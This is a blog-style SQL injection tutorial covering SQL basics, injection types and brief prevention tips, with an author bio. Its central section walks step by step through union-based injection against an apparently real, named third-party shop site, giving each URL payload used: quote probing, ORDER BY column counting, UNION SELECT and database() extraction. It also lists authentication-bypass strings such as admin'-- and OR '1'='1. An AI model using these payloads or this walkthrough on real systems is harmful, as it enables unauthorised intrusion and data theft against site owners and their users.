WHAT IS SQL
SQL (Structured Query Language) is a standardized programming language specifically designed for managing and manipulating relational databases. It allows users to create, read, update, and delete data within a database. SQL is essential for interacting with and extracting valuable information from databases, which are widely used in various applications and systems.
What Is Sqli
SQL Injection is a type of security vulnerability that occurs in the database layer of an application. It happens when an attacker is able to insert or "inject" malicious SQL code into a query. This can compromise the security and integrity of the database and potentially the entire application. Here’s a simplified example to illustrate how SQL Injection works:
- Normal Scenario:
- Suppose you have a web application with a login form. The SQL query to check the user credentials might look something like this:
SELECT * FROM users WHERE username = 'admin' AND password = 'password';
MYSQL Union Based
Detect columns number
First you need to know the number of columns
Using order by or group by
Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different funcionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
-1' UNION SELECT 1,2,3--+ True
or
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
TYPS OF SQL INJECTION
There are several types of SQL injection attacks that hackers can use to exploit vulnerabilities in websites and applications:
1. In-band SQL Injection:
This is the most common type of SQL injection attack, where the malicious SQL code is sent to the database and the results are displayed back to the attacker. In-band attacks can be further classified into
- - Error-based SQL Injection:
- Hackers exploit error messages generated by the database to extract information about the structure and content of the database.
- - Union-based SQL Injection:
- Attackers use the UNION SQL operator to combine the results of two or more SELECT queries and retrieve additional information from the database.
2. Blind SQL Injection:
In this type of attack, the attacker cannot directly see the results of their actions, making it more challenging to exploit. Blind SQL injection attacks can be classified into:
- - Boolean-based SQL Injection:
- Attackers perform the injection by sending a series of true/false queries to the database to infer information.
- - Time-based SQL Injection:
- The attacker uses time delays to determine if a query is executed successfully based on the response time.
3. Out-of-band SQL Injection:
In this type of attack, the attacker uses a separate channel to extract data from the database, such as sending emails or making HTTP requests to a remote server.
How To Do Sql Injection
This Is A Website Perameater
https://itorchjo.com/shop.php?brandId=21
Now we will check by using ' " / \ in the website parameters to see if any errors or changes occur on the website.
https://itorchjo.com/shop.php?brandId=21'
Carefully look at both images; changes have occurred on the website when using '
Now we will try to fix this error with the help of URL balancer using --+ --+- -- - --/* and many more.
https://itorchjo.com/shop.php?brandId=21 -- -
After removing ' from the URL and adding -- - the error was fixed
Now we need to find out how many columns are in the website, so let's start finding them.
To find columns, we use `ORDER BY` and `GROUP BY
https://itorchjo.com/shop.php?brandId=21 order by 4 -- -
When we used `ORDER BY 4`, an error occurred on the website, which means there are not 4 columns. Now, we will keep reducing the number of columns until the error disappears.
Now, when we used `ORDER BY 3`, the website error was fixed. This means that the website has 3 columns.
https://itorchjo.com/shop.php?brandId=21 Order by 3 -- -
Since we have determined that the website has 3 columns, we now need to find out which of these columns is vulnerable. To find the vulnerable column, we use `UNION SELECT
https://itorchjo.com/shop.php?brandId=.21+UNION+SELECT+1,2,3-- -
Now that we have identified the vulnerable column, which is column 2, we can inject our malicious queries into this column.
https://itorchjo.com/shop.php?brandId=.21+UNION+SELECT+1,database(),3-- -
What is Sqli Dios
"dump in one shot" refers to extracting the entire database in a single attack. This happens when an attacker injects malicious SQL code into a vulnerable input, allowing them to access or dump all the database data.
Different Types of SQL Injection
- 1.GET-Based SQL Injection:
- Description: Occurs when user input is included in a URL query string and is directly used in SQL queries without proper sanitization.,
Example: If a URL like http://example.com/page?id=1 directly includes the id parameter in an SQL query:
SELECT * FROM pages WHERE id = '1';
- Injection: An attacker might manipulate the URL to include malicious SQL code:
http://example.com/page?id=1' OR '1'='1
- Resulting in:
SELECT * FROM pages WHERE id = '1' OR '1'='1';
- 2. POST-Based SQL Injection:
- Description: Occurs when user input is submitted via an HTTP POST request, typically through form data.
Example: A login form where the user submits a username and password:
SELECT * FROM users WHERE username = 'user' AND password = 'pass';
- Injection: An attacker might submit:
username=admin'--&password=anything
- Resulting in:
SELECT * FROM users WHERE username = 'admin'--' AND password = 'anything';
- The -- comments out the rest of the query, potentially bypassing authentication.
- 3. Cookie-Based SQL Injection:
- Description: Occurs when an application reads data from cookies and uses it in SQL queries without proper sanitization.
Example: If a web application reads a user ID from a cookie and uses it in a query:
SELECT * FROM users WHERE id = 'cookie_value';
- Injection: An attacker might modify the cookie value to include malicious SQL:
cookie_value=1' OR '1'='1
- Resulting in:
SELECT * FROM users WHERE id = '1' OR '1'='1';
- 4. Header-Based SQL Injection:
- Description: Occurs when an application reads HTTP headers (such as User-Agent, Referer) and uses them in SQL queries without sanitization.
Example: If a web application logs User-Agent values into a database:-
INSERT INTO logs (user_agent) VALUES ('header_value');
- Injection: An attacker might set the User-Agent header to a malicious value:
User-Agent: malicious' OR '1'='1
- Resulting in:
INSERT INTO logs (user_agent) VALUES ('malicious' OR '1'='1');
1.Prevention Techniques
- Parameterized Queries:
Use prepared statements and parameterized queries to ensure user input is treated as data, not executable code.- 2.Input Validation and Sanitization:
Validate and sanitize all user inputs to ensure they conform to expected formats.- 3.Escaping User Inputs:
Properly escape special characters in user inputs to prevent them from being interpreted as part of the SQL code.- 4.Least Privilege:
Use database accounts with the least privilege necessary for the task to minimize potential damage from an injection.- 5.Regular Security Testing:
Conduct regular security assessments, including penetration testing and code reviews, to identify and fix vulnerabilities.Conduct regular security assessments, including penetration testing and code reviews, to identify and fix vulnerabilities.
Google Dork For Sql Injection
Devoloper AnneX
Hello friends, I'm Annex here! I'm Admin OF BlackEagle Security 💻
I'm a web developer and also an ethical hacker, pentester, bug hunter, and cyber security expert. 💻
I write code, break code, hunt for bugs, and secure systems. 🔒
Bringing together the worlds of programming and cyber security is my passion. 📠
If you ever need help with anything related to tech or security, I'm here to assist you! 🚡
Excited to connect with fellow tech enthusiasts and share knowledge! Let's dominate the digital world! 🚀